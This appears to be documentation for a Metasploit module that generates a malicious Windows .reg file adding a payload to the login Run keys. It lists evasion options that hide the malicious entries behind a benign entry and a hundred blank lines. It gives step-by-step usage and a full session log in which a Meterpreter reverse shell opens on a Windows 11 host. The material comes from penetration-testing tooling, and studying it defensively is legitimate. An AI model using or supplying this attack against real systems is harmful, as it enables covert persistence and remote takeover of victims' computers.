bcoles
3.9 KiB
Vulnerable Application
This module creates a Windows Registration Entries (.reg) file which adds the specified payload to the Windows Registry. The payload runs upon Windows login for the current user. If the user has elevated privileges when opening the file, the payload will run upon login when any user logs in.
The user will receive a warning prompt to confirm Registry changes when opening the file.
This module has been tested successfully on:
- Microsoft Windows 7 Professional SP1 (x86_64)
- Microsoft Windows 11 Professional 21H2 (x86_64)
Options
FILENAME
The registration entries file name. (Default: msf.reg).
Advanced Options
AddToCurrentUserWindowsCurrentVersionRun
Add payload to login for current user. (Default: true)
AddToCurrentUserWindowsCurrentVersionRunOnce
Same as AddToCurrentUserWindowsCurrentVersionRun, but the registry key is deleted after use. (Default: false)
AddToLocalMachineWindowsCurrentVersionRun
Add payload to login for all users. The user will see a vague error message if they do not have the necessary permissions,
but all other entries are still added successfully. (Default: true)
AddToLocalMachineWindowsCurrentVersionRunOnce
Same as AddToLocalMachineWindowsCurrentVersionRun, but the registry key is deleted after use.' (Default: false)
PrependBenignEntry
Prepend a benign registry entry at the start of the file. (Default: true),
PrependNewLines
Prepend new lines before the first malicious registry entry. (Default: 100)
Verification Steps
On the Metasploit host:
- Start msfconsole
- Do:
use exploit/windows/fileformat/windows_registration_entries - Do:
set filename [filename.reg] - Do:
set payload [payload] - Do:
set lhost [lhost] - Do:
set lport [lport] - Do:
run - Do:
handler -p [payload] -P [lport] -H [lhost]
On the target Windows machine:
- Ensure Windows Security is disabled
- Open the
msf.regfile and clickYesfor the "Are you sure you want to continue?" prompt - Log out then login as the same user
Scenarios
Microsoft Windows 11 Professional 21H2 (x86_64)
msf6 > use exploit/windows/fileformat/windows_registration_entries
[*] No payload configured, defaulting to cmd/windows/http/x64/meterpreter/reverse_tcp
msf6 exploit(windows/fileformat/windows_registration_entries) > set payload cmd/windows/http/x64/meterpreter/reverse_tcp
payload => cmd/windows/http/x64/meterpreter/reverse_tcp
msf6 exploit(windows/fileformat/windows_registration_entries) > set lhost 192.168.200.130
lhost => 192.168.200.130
msf6 exploit(windows/fileformat/windows_registration_entries) > set lport 4444
lport => 4444
msf6 exploit(windows/fileformat/windows_registration_entries) > run
[+] msf.reg stored at /root/.msf4/local/msf.reg
[*] This file will create the following registry keys:
HKEY_CURRENT_USER\Software\JpWpgNXlLXXrQv\Kz8Qi33Zow
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\2iL9aN40YYLwgDl
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\rhFG8l9yvhQ
msf6 exploit(windows/fileformat/windows_registration_entries) > handler -p cmd/windows/http/x64/meterpreter/reverse_tcp -P 4444 -H 192.168.200.130
[*] Payload handler running as background job 0.
msf6 exploit(windows/fileformat/windows_registration_entries) >
[*] Started reverse TCP handler on 192.168.200.130:4444
msf6 exploit(windows/fileformat/windows_registration_entries) >
[*] Sending stage (203846 bytes) to 192.168.200.169
[*] Meterpreter session 1 opened (192.168.200.130:4444 -> 192.168.200.169:59250) at 2025-07-13 08:42:07 -0400
msf6 exploit(windows/fileformat/windows_registration_entries) > sessions -i -1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: win-11-pro-x64\asdf
meterpreter > sysinfo
Computer : WIN-11-PRO-X64
OS : Windows 11 21H2 (10.0 Build 22000).
Architecture : x64
System Language : en_GB
Domain : WORKGROUP
Logged On Users : 5
Meterpreter : x64/windows